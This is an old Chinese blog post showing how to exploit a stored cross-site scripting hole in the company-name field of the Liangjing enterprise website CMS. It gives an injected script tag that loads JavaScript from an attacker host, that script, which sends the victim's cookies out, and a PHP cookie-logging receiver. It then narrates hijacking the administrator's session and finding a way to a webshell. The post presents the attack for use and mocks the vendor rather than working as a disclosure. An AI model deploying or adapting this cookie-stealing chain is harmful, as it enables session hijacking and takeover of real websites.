主题:良精多风格多语企业网站管理系统有漏洞
难度:中
知识点:脚本、跨站
工具包:get.php    MyBrower.exe   qq.js
漏洞处:公司名称跨站漏洞


今天让大家看一下漏洞的利用方法


<script src=http://192.168.1.101/qq.js></script>


192.168.1.101/get.php是我们获得COOKIE的程序
192.168.1.101/test.txt是我们获得cookie的文本

get.php
----------------------
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('test.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
------------------------
qq,js
------------------------
document.write('<img src="http://localhost/get.php?c='+document.cookie+'" width=0 height=0 border=0 />');
------------------------

现在模拟管理员进管理后台

点了一下这里,就有问题了
我们获得他的SESSION
现在来入侵


^_^这样就进来了。晕啊呵呵

看,这样不行的哦

良精的人可能还不信,说这是小儿科。不信我就修改一下看看  哼


信了不。88
我们已经发现了可以获得webshell的地方

posted on 2007-05-12 09:16  %5C  阅读(3930)  评论(0编辑  收藏  举报